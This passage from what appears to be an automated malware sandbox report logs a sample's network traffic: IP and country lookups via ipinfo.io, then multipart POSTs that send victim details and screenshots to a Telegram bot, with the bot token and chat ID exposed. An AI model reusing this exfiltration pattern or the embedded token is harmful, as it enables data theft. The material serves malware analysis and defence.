                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1038&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1412682&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.44973634.117.59.814437644C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-27 18:22:27 UTC61OUTGET /ip HTTP/1.1
                                                                                                                  Host: ipinfo.io
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2024-10-27 18:22:27 UTC305INHTTP/1.1 200 OK
                                                                                                                  date: Sun, 27 Oct 2024 18:22:26 GMT
                                                                                                                  content-type: text/plain; charset=utf-8
                                                                                                                  Content-Length: 14
                                                                                                                  access-control-allow-origin: *
                                                                                                                  via: 1.1 google
                                                                                                                  strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Connection: close
                                                                                                                  2024-10-27 18:22:27 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30
                                                                                                                  Data Ascii: 173.254.250.90


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.44973734.117.59.814437644C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-27 18:22:27 UTC42OUTGET /country HTTP/1.1
                                                                                                                  Host: ipinfo.io
                                                                                                                  2024-10-27 18:22:28 UTC448INHTTP/1.1 200 OK
                                                                                                                  access-control-allow-origin: *
                                                                                                                  Content-Length: 3
                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                  date: Sun, 27 Oct 2024 18:22:28 GMT
                                                                                                                  referrer-policy: strict-origin-when-cross-origin
                                                                                                                  x-content-type-options: nosniff
                                                                                                                  x-frame-options: SAMEORIGIN
                                                                                                                  x-xss-protection: 1; mode=block
                                                                                                                  via: 1.1 google
                                                                                                                  strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Connection: close
                                                                                                                  2024-10-27 18:22:28 UTC3INData Raw: 55 53 0a
                                                                                                                  Data Ascii: US


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.449738149.154.167.2204437644C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-27 18:22:29 UTC255OUTPOST /bot2088971373:AAFvpTb_CUPp2OYxd9kBl53Xnu14PH8bMfQ/sendPhoto HTTP/1.1
                                                                                                                  Content-Type: multipart/form-data; boundary="68d30593-7ba0-4754-ba4f-858b55a2ddb4"
                                                                                                                  Host: api.telegram.org
                                                                                                                  Content-Length: 74846
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2024-10-27 18:22:29 UTC25INHTTP/1.1 100 Continue
                                                                                                                  2024-10-27 18:22:29 UTC40OUTData Raw: 2d 2d 36 38 64 33 30 35 39 33 2d 37 62 61 30 2d 34 37 35 34 2d 62 61 34 66 2d 38 35 38 62 35 35 61 32 64 64 62 34 0d 0a
                                                                                                                  Data Ascii: --68d30593-7ba0-4754-ba4f-858b55a2ddb4
                                                                                                                  2024-10-27 18:22:29 UTC89OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a
                                                                                                                  Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
                                                                                                                  2024-10-27 18:22:29 UTC10OUTData Raw: 31 36 38 32 34 33 36 33 31 35
                                                                                                                  Data Ascii: 1682436315
                                                                                                                  2024-10-27 18:22:29 UTC131OUTData Raw: 0d 0a 2d 2d 36 38 64 33 30 35 39 33 2d 37 62 61 30 2d 34 37 35 34 2d 62 61 34 66 2d 38 35 38 62 35 35 61 32 64 64 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 61 70 74 69 6f 6e 0d 0a 0d 0a
                                                                                                                  Data Ascii: --68d30593-7ba0-4754-ba4f-858b55a2ddb4Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=caption
                                                                                                                  2024-10-27 18:22:29 UTC133OUTData Raw: 6e 65 77 20 75 73 65 72 20 63 6f 6e 6e 65 63 74 20 21 0a 49 44 3a 20 31 31 30 34 63 61 61 38 39 39 33 31 32 31 66 32 66 35 61 65 62 64 62 36 66 63 39 64 62 64 33 31 64 33 39 65 66 66 38 63 0a 43 6f 6d 6d 65 6e 74 3a 20 0a 55 73 65 72 6e 61 6d 65 3a 20 6a 6f 6e 65 73 0a 50 43 20 4e 61 6d 65 3a 20 33 36 34 33 33 39 0a 49 50 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0a 47 45 4f 3a 20 55 53 0a
                                                                                                                  Data Ascii: new user connect !ID: 1104caa8993121f2f5aebdb6fc9dbd31d39eff8cComment: Username: userPC Name: 364339IP: 173.254.250.90GEO: US
                                                                                                                  2024-10-27 18:22:29 UTC146OUTData Raw: 0d 0a 2d 2d 36 38 64 33 30 35 39 33 2d 37 62 61 30 2d 34 37 35 34 2d 62 61 34 66 2d 38 35 38 62 35 35 61 32 64 64 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 70 68 6f 74 6f 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 0d 0a 0d 0a
                                                                                                                  Data Ascii: --68d30593-7ba0-4754-ba4f-858b55a2ddb4Content-Disposition: form-data; name=photo; filename=screenshot.png; filename*=utf-8''screenshot.png
                                                                                                                  2024-10-27 18:22:29 UTC4096OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1AQa"q2
                                                                                                                  2024-10-27 18:22:29 UTC4096OUTData Raw: ca a8 56 78 b7 10 77 26 e3 b9 08 38 c1 c8 03 3f 42 6b a2 35 e9 39 7b 38 bd 51 cb 3c 35 75 0f 6b 25 a3 ea 58 2a 69 31 4a ae 18 65 48 23 d8 d3 b7 7a f3 5b 1c fa 8c a2 9f 84 f3 ed a2 f3 23 1f 68 80 ce ae 58 ed 54 52 db 89 e3 f8 76 36 71 9e 95 12 3a 34 b0 a3 cb 0a 09 60 8a e0 39 2c 55 52 45 0c b9 c2 e7 a1 19 c0 35 82 c4 52 72 e5 52 d7 fa ff 00 23 a1 e1 6b 28 f3 38 e9 fd 7f 99 ab a3 eb 97 5a 3c d9 88 ef 85 8f cf 13 1e 0f f8 1f 7a bf 0f 8c f5 4b 7b b9 1c 48 b3 5b 99 19 92 29 d7 3b 01 3c 00 47 23 f3 ac 43 6d 1e fb 21 1e a5 a7 c8 2f 3c e3 1b 03 30 c2 c4 a5 9d 88 68 c1 da 30 46 40 39 3c 0e 87 10 e0 48 6d 0d ac f0 5e 47 78 59 60 96 07 3b 59 97 ef 03 bc 29 5c 02 09 dc 00 c1 cf 4a e1 71 c0 4e ab 9b 4b 99 ef fd 77 fc 4e f8 ff 00 68 d2 a6 a3 1b f2 ad 57 f5 db f0 3b 7b
                                                                                                                  Data Ascii: Vxw&8?Bk59{8Q<5uk%X*i1JeH#z[#hXTRv6q:4`9,URE5RrR#k(8Z<zK{H[);<G#Cm!/<0h0F@9<Hm^GxY`;Y)\JqNKwNhW;{
                                                                                                                  2024-10-27 18:22:29 UTC4096OUTData Raw: b8 8c 3d 4c 3c fd 9d 45 66 38 31 a3 77 a8 a6 d1 5a 98 8e 2a a7 da 9a 63 3d b9 a3 34 66 8d 00 6e d2 29 0d 4b ba 8f 94 f6 a0 2e 45 45 49 b0 76 34 d2 8c 28 d4 77 1b 45 1d 3d 69 3b d2 18 51 45 14 00 52 52 d1 8a 06 25 14 51 40 c2 92 96 93 14 00 51 de 8c 51 40 08 68 a5 a4 a0 02 90 d2 d1 40 c4 a2 8a 28 00 a4 a5 a2 81 89 48 69 68 a0 04 a0 d2 d2 53 01 28 a5 a2 81 89 49 4b 49 40 c2 92 96 8a 00 4a 28 a2 81 89 45 2d 25 30 10 d1 4b 49 40 09 45 2d 25 05 05 06 8a 0d 00 25 25 2d 14 0c 4a 4a 5a 28 01 29 0d 2d 14 0c 4a 0d 14 50 31 29 29 d4 98 a0 10 94 94 ec 52 1a 06 25 14 b4 94 0c 43 49 4e a4 22 80 12 92 96 8a 06 36 8a 5a 43 40 c2 92 96 92 80 0a 4a 5a 28 28 4a 4a 5a 4a 00 4a 4a 75 25 03 12 92 96 8a 2c 31 0f 34 87 22 97 bd 07 9a 06 36 93 bd 3b d6 93 fc 68 18 94 1a 28 eb c7
                                                                                                                  Data Ascii: =L<Ef81wZ*c=4fn)K.EEIv4(wE=i;QERR%Q@QQ@h@(HihS(IKI@J(E-%0KI@E-%%%-JJZ()-JP1))R%CIN"6ZC@JZ((JJZJJJu%,14"6;h(
                                                                                                                  2024-10-27 18:22:29 UTC4096OUTData Raw: 49 40 07 7a 4f 63 f9 52 e7 b0 fc a9 3f 97 bd 00 1d 28 1c 77 a5 c6 69 31 40 c2 93 39 ed 4b df f9 d0 28 00 3e 94 9f 95 1f 5a 3a 50 31 31 f9 7b 50 78 fa 52 91 ff 00 eb a4 23 07 b5 00 27 b7 f2 a5 a3 b5 04 1c 52 0b 9d ed 14 51 50 7c b1 14 f3 4d 69 63 79 7b 0e a3 6f a7 4e 81 6d ed 67 b8 59 59 7c d7 39 6c 79 68 c7 84 56 1d 3f 88 54 37 2b 2a be b0 34 ed 34 eb 41 da de 7b 68 62 69 11 45 bc db 8b c8 00 da d8 46 1b 32 70 17 ab 0a 92 7d 3a 29 63 17 f3 41 ba 25 94 43 e6 1c 60 3e 33 8f 5e 95 51 f4 2d 3e 46 2c 60 00 9e a4 57 93 5b 09 56 ad 59 54 a7 3f 2f 97 63 de c3 63 e8 d0 a3 1a 55 69 5d 6f ea fb 9a ad bd bc 47 aa 98 b4 d9 35 3f 33 5d 96 0b c6 12 38 16 30 00 a4 39 2a 40 50 77 39 de f9 5f 93 a7 5a a3 65 2b c9 a2 e8 f7 2d a6 cd 73 a7 8b 2b e6 97 55 2e e0 5b 04 96 62 9c
                                                                                                                  Data Ascii: I@zOcR?(wi1@9K(>Z:P11{PxR#'RQP|Micy{oNmgYY|9lyhV?T7+*44A{hbiEF2p}:)cA%C`>3^Q->F,`W[VYT?/ccUi]oG5?3]809*@Pw9_Ze+-s+U.[b
                                                                                                                  2024-10-27 18:22:30 UTC1557INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Sun, 27 Oct 2024 18:22:30 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 1168
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                  {"ok":true,"result":{"message_id":6298,"from":{"id":2088971373,"is_bot":true,"first_name":"Logs","username":"efim228proggvp_bot"},"chat":{"id":1682436315,"first_name":"efim","username":"efim228proggvp","type":"private"},"date":1730053350,"photo":[{"file_id":"AgACAgQAAxkDAAIYmmcehOZJ12jCTDCTveemQiFESAdLAAIMxzEbX03xUJCV-AwKDwSQAQADAgADcwADNgQ","file_unique_id":"AQADDMcxG19N8VB4","file_size":1043,"width":90,"height":72},{"file_id":"AgACAgQAAxkDAAIYmmcehOZJ12jCTDCTveemQiFESAdLAAIMxzEbX03xUJCV-AwKDwSQAQADAgADbQADNgQ","file_unique_id":"AQADDMcxG19N8VBy","file_size":11910,"width":320,"height":256},{"file_id":"AgACAgQAAxkDAAIYmmcehOZJ12jCTDCTveemQiFESAdLAAIMxzEbX03xUJCV-AwKDwSQAQADAgADeAADNgQ","file_unique_id":"AQADDMcxG19N8VB9","file_size":49884,"width":800,"height":640},{"file_id":"AgACAgQAAxkDAAIYmmcehOZJ12jCTDCTveemQiFESAdLAAIMxzEbX03xUJCV-AwKDwSQAQADAgADeQADNgQ","file_unique_id":"AQADDMcxG19N8VB-","file_size":74253,"width":1280,"height":1024}],"caption":"new user connect !\nID: 1104caa8993121f2f5aebdb6fc9dbd31d3 [TRUNCATED]


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.44974934.117.59.814433512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-27 18:22:50 UTC61OUTGET /ip HTTP/1.1
                                                                                                                  Host: ipinfo.io
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2024-10-27 18:22:50 UTC305INHTTP/1.1 200 OK
                                                                                                                  date: Sun, 27 Oct 2024 18:22:50 GMT
                                                                                                                  content-type: text/plain; charset=utf-8
                                                                                                                  Content-Length: 14
                                                                                                                  access-control-allow-origin: *
                                                                                                                  via: 1.1 google
                                                                                                                  strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Connection: close
                                                                                                                  2024-10-27 18:22:50 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30
                                                                                                                  Data Ascii: 173.254.250.90


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  4192.168.2.44975234.117.59.814433512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-27 18:22:51 UTC42OUTGET /country HTTP/1.1
                                                                                                                  Host: ipinfo.io
                                                                                                                  2024-10-27 18:22:51 UTC448INHTTP/1.1 200 OK
                                                                                                                  access-control-allow-origin: *
                                                                                                                  Content-Length: 3
                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                  date: Sun, 27 Oct 2024 18:22:51 GMT
                                                                                                                  referrer-policy: strict-origin-when-cross-origin
                                                                                                                  x-content-type-options: nosniff
                                                                                                                  x-frame-options: SAMEORIGIN
                                                                                                                  x-xss-protection: 1; mode=block
                                                                                                                  via: 1.1 google
                                                                                                                  strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Connection: close
                                                                                                                  2024-10-27 18:22:51 UTC3INData Raw: 55 53 0a
                                                                                                                  Data Ascii: US


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  5192.168.2.449756149.154.167.2204433512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-27 18:22:52 UTC255OUTPOST /bot2088971373:AAFvpTb_CUPp2OYxd9kBl53Xnu14PH8bMfQ/sendPhoto HTTP/1.1
                                                                                                                  Content-Type: multipart/form-data; boundary="e62f1995-643c-4ec6-8579-e0af2437cb00"
                                                                                                                  Host: api.telegram.org
                                                                                                                  Content-Length: 74797
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2024-10-27 18:22:53 UTC25INHTTP/1.1 100 Continue
                                                                                                                  2024-10-27 18:22:53 UTC40OUTData Raw: 2d 2d 65 36 32 66 31 39 39 35 2d 36 34 33 63 2d 34 65 63 36 2d 38 35 37 39 2d 65 30 61 66 32 34 33 37 63 62 30 30 0d 0a
                                                                                                                  Data Ascii: --e62f1995-643c-4ec6-8579-e0af2437cb00
                                                                                                                  2024-10-27 18:22:53 UTC89OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a
                                                                                                                  Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
                                                                                                                  2024-10-27 18:22:53 UTC10OUTData Raw: 31 36 38 32 34 33 36 33 31 35
                                                                                                                  Data Ascii: 1682436315
                                                                                                                  2024-10-27 18:22:53 UTC131OUTData Raw: 0d 0a 2d 2d 65 36 32 66 31 39 39 35 2d 36 34 33 63 2d 34 65 63 36 2d 38 35 37 39 2d 65 30 61 66 32 34 33 37 63 62 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 61 70 74 69 6f 6e 0d 0a 0d 0a
                                                                                                                  Data Ascii: --e62f1995-643c-4ec6-8579-e0af2437cb00Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=caption
                                                                                                                  2024-10-27 18:22:53 UTC84OUTData Raw: 4c 6f 67 20 63 6f 6c 6c 65 63 74 65 64 0a 49 44 3a 20 31 31 30 34 63 61 61 38 39 39 33 31 32 31 66 32 66 35 61 65 62 64 62 36 66 63 39 64 62 64 33 31 64 33 39 65 66 66 38 63 0a 43 6f 6d 6d 65 6e 74 3a 20 0a 4c 6f 67 20 73 69 7a 65 3a 20 37 33 32 37 31
                                                                                                                  Data Ascii: Log collectedID: 1104caa8993121f2f5aebdb6fc9dbd31d39eff8cComment: Log size: 73271
                                                                                                                  2024-10-27 18:22:53 UTC146OUTData Raw: 0d 0a 2d 2d 65 36 32 66 31 39 39 35 2d 36 34 33 63 2d 34 65 63 36 2d 38 35 37 39 2d 65 30 61 66 32 34 33 37 63 62 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 70 68 6f 74 6f 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 0d 0a 0d 0a
                                                                                                                  Data Ascii: --e62f1995-643c-4ec6-8579-e0af2437cb00Content-Disposition: form-data; name=photo; filename=screenshot.png; filename*=utf-8''screenshot.png
                                                                                                                  2024-10-27 18:22:53 UTC4096OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1AQa"q2
                                                                                                                  2024-10-27 18:22:53 UTC4096OUTData Raw: ca a8 56 78 b7 10 77 26 e3 b9 08 38 c1 c8 03 3f 42 6b a2 35 e9 39 7b 38 bd 51 cb 3c 35 75 0f 6b 25 a3 ea 58 2a 69 31 4a ae 18 65 48 23 d8 d3 b7 7a f3 5b 1c fa 8c a2 9f 84 f3 ed a2 f3 23 1f 68 80 ce ae 58 ed 54 52 db 89 e3 f8 76 36 71 9e 95 12 3a 34 b0 a3 cb 0a 09 60 8a e0 39 2c 55 52 45 0c b9 c2 e7 a1 19 c0 35 82 c4 52 72 e5 52 d7 fa ff 00 23 a1 e1 6b 28 f3 38 e9 fd 7f 99 ab a3 eb 97 5a 3c d9 88 ef 85 8f cf 13 1e 0f f8 1f 7a bf 0f 8c f5 4b 7b b9 1c 48 b3 5b 99 19 92 29 d7 3b 01 3c 00 47 23 f3 ac 43 6d 1e fb 21 1e a5 a7 c8 2f 3c e3 1b 03 30 c2 c4 a5 9d 88 68 c1 da 30 46 40 39 3c 0e 87 10 e0 48 6d 0d ac f0 5e 47 78 59 60 96 07 3b 59 97 ef 03 bc 29 5c 02 09 dc 00 c1 cf 4a e1 71 c0 4e ab 9b 4b 99 ef fd 77 fc 4e f8 ff 00 68 d2 a6 a3 1b f2 ad 57 f5 db f0 3b 7b
                                                                                                                  Data Ascii: Vxw&8?Bk59{8Q<5uk%X*i1JeH#z[#hXTRv6q:4`9,URE5RrR#k(8Z<zK{H[);<G#Cm!/<0h0F@9<Hm^GxY`;Y)\JqNKwNhW;{
                                                                                                                  2024-10-27 18:22:53 UTC4096OUTData Raw: b8 8c 3d 4c 3c fd 9d 45 66 38 31 a3 77 a8 a6 d1 5a 98 8e 2a a7 da 9a 63 3d b9 a3 34 66 8d 00 6e d2 29 0d 4b ba 8f 94 f6 a0 2e 45 45 49 b0 76 34 d2 8c 28 d4 77 1b 45 1d 3d 69 3b d2 18 51 45 14 00 52 52 d1 8a 06 25 14 51 40 c2 92 96 93 14 00 51 de 8c 51 40 08 68 a5 a4 a0 02 90 d2 d1 40 c4 a2 8a 28 00 a4 a5 a2 81 89 48 69 68 a0 04 a0 d2 d2 53 01 28 a5 a2 81 89 49 4b 49 40 c2 92 96 8a 00 4a 28 a2 81 89 45 2d 25 30 10 d1 4b 49 40 09 45 2d 25 05 05 06 8a 0d 00 25 25 2d 14 0c 4a 4a 5a 28 01 29 0d 2d 14 0c 4a 0d 14 50 31 29 29 d4 98 a0 10 94 94 ec 52 1a 06 25 14 b4 94 0c 43 49 4e a4 22 80 12 92 96 8a 06 36 8a 5a 43 40 c2 92 96 92 80 0a 4a 5a 28 28 4a 4a 5a 4a 00 4a 4a 75 25 03 12 92 96 8a 2c 31 0f 34 87 22 97 bd 07 9a 06 36 93 bd 3b d6 93 fc 68 18 94 1a 28 eb c7
                                                                                                                  Data Ascii: =L<Ef81wZ*c=4fn)K.EEIv4(wE=i;QERR%Q@QQ@h@(HihS(IKI@J(E-%0KI@E-%%%-JJZ()-JP1))R%CIN"6ZC@JZ((JJZJJJu%,14"6;h(
                                                                                                                  2024-10-27 18:22:53 UTC4096OUTData Raw: 49 40 07 7a 4f 63 f9 52 e7 b0 fc a9 3f 97 bd 00 1d 28 1c 77 a5 c6 69 31 40 c2 93 39 ed 4b df f9 d0 28 00 3e 94 9f 95 1f 5a 3a 50 31 31 f9 7b 50 78 fa 52 91 ff 00 eb a4 23 07 b5 00 27 b7 f2 a5 a3 b5 04 1c 52 0b 9d ed 14 51 50 7c b1 14 f3 4d 69 63 79 7b 0e a3 6f a7 4e 81 6d ed 67 b8 59 59 7c d7 39 6c 79 68 c7 84 56 1d 3f 88 54 37 2b 2a be b0 34 ed 34 eb 41 da de 7b 68 62 69 11 45 bc db 8b c8 00 da d8 46 1b 32 70 17 ab 0a 92 7d 3a 29 63 17 f3 41 ba 25 94 43 e6 1c 60 3e 33 8f 5e 95 51 f4 2d 3e 46 2c 60 00 9e a4 57 93 5b 09 56 ad 59 54 a7 3f 2f 97 63 de c3 63 e8 d0 a3 1a 55 69 5d 6f ea fb 9a ad bd bc 47 aa 98 b4 d9 35 3f 33 5d 96 0b c6 12 38 16 30 00 a4 39 2a 40 50 77 39 de f9 5f 93 a7 5a a3 65 2b c9 a2 e8 f7 2d a6 cd 73 a7 8b 2b e6 97 55 2e e0 5b 04 96 62 9c
                                                                                                                  Data Ascii: I@zOcR?(wi1@9K(>Z:P11{PxR#'RQP|Micy{oNmgYY|9lyhV?T7+*44A{hbiEF2p}:)cA%C`>3^Q->F,`W[VYT?/ccUi]oG5?3]809*@Pw9_Ze+-s+U.[b
                                                                                                                  2024-10-27 18:22:53 UTC1445INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Sun, 27 Oct 2024 18:22:53 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 1056
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                  {"ok":true,"result":{"message_id":6300,"from":{"id":2088971373,"is_bot":true,"first_name":"Logs","username":"efim228proggvp_bot"},"chat":{"id":1682436315,"first_name":"efim","username":"efim228proggvp","type":"private"},"date":1730053373,"photo":[{"file_id":"AgACAgQAAxkDAAIYmmcehOZJ12jCTDCTveemQiFESAdLAAIMxzEbX03xUJCV-AwKDwSQAQADAgADcwADNgQ","file_unique_id":"AQADDMcxG19N8VB4","file_size":1043,"width":90,"height":72},{"file_id":"AgACAgQAAxkDAAIYmmcehOZJ12jCTDCTveemQiFESAdLAAIMxzEbX03xUJCV-AwKDwSQAQADAgADbQADNgQ","file_unique_id":"AQADDMcxG19N8VBy","file_size":11910,"width":320,"height":256},{"file_id":"AgACAgQAAxkDAAIYmmcehOZJ12jCTDCTveemQiFESAdLAAIMxzEbX03xUJCV-AwKDwSQAQADAgADeAADNgQ","file_unique_id":"AQADDMcxG19N8VB9","file_size":49884,"width":800,"height":640},{"file_id":"AgACAgQAAxkDAAIYmmcehOZJ12jCTDCTveemQiFESAdLAAIMxzEbX03xUJCV-AwKDwSQAQADAgADeQADNgQ","file_unique_id":"AQADDMcxG19N8VB-","file_size":74253,"width":1280,"height":1024}],"caption":"Log collected\nID: 1104caa8993121f2f5aebdb6fc9dbd31d39eff8 [TRUNCATED]


                                                                                                                  Click to jump to process

                                                                                                                  Click to jump to process

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Click to jump to process

                                                                                                                  Target ID:0
                                                                                                                  Start time:14:22:02
                                                                                                                  Start date:27/10/2024
                                                                                                                  Path:C:\Users\user\Desktop\PbfYaIvR5B.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\PbfYaIvR5B.exe"
                                                                                                                  Imagebase:0x40000
                                                                                                                  File size:2'319'208 bytes
                                                                                                                  MD5 hash:7471EB468A1F0166167F369BEC578915
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
